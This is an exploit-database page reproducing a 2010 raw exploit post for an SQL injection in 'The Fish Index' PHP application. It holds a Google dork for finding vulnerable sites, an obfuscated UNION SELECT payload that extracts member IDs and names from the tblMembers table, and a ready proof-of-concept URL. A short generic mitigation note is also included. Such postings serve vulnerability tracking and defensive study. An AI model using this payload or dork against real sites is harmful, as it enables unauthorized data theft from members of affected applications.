header-logo
Suggest Exploit
vendor:
N/A
by:
v4lc0m87
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Member ID The Fish Index PHP SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted SQL query to the vulnerable application. The crafted query can be sent as a parameter value in the URL. The crafted query can be used to extract data from the database, modify data, execute administration operations on the database, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries. Parameterized queries should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

*************************************************************************
 ,                              
 |       ,---. ,   . |---. ,---. ,---.   ,---. ,---. ,---. ,   .   ,
 |  ---  |     |   | |   | |---' |       |     |     |---' |   |   |
 |       `---' `---| `---' `---' `       `---' `     `---' `---`---
 `             `---'                                                  
*************************************************************************
[V] Member ID The Fish Index PHP SQL Injection Vulnerability
 
            --==[ Author ]==--

[+] Author  : v4lc0m87
[+] Contact : valcom87[at]gmail[dot]com
[+] Group   : INDONESIAN CYBER
[+] Site    : http://indonesian-cyber.org/
[+] Date    : June, 3-2010 [INDONESIA]
 
*************************************************************************
            --==[ Details ]==--
 
[+] Vulnerable  : SQL Injection
[+] Google Dork : inurl:index.php?myPlantId=
 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
[-] Exploit :
[+] 9/**/union/**/all/**/select/**/9,9,9,concat_ws%280x3a,MemberID,MembeFirstName%29v4lc0m87,9,9/**/from/**/tblMembers--
 
[-] Remote SQLi p0c :
[+] http://127.0.0.1/[path]/index.php?myPlantId=9/**/union/**/all/**/select/**/9,9,9,concat_ws%280x3a,MemberID,MembeFirstName%29v4lc0m87,9,9/**/from/**/tblMembers--
     
 
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 
INDONESIAN-CYBER.ORG | DEVILZC0DE.ORG | INDONESIANHACKER.ORG | HACKER-CISADANE.ORG | IDC
 
[V] Greetz :
SaruKusai, MarilynMesum (smoga jadi pasangan sejati wkwkwkwk)
Team m0n0n banci kamera(clase_1214n,c4uR,astroboyyy,aldy182,vhesckot_1601)
Bocah tua nakal (mbah l4mpor,awchoy)
flyff666 cruz3N petimati spykit v3n0m uzanc
kokoh wisdom (di FB koq curhat mlu sih koh :p)
blue screen, skutengboy (kalian pasangan yg serasi juga loh, jikakakakakk)
[K]urabu[S]aru [RnR] cO2 community
and y0u !!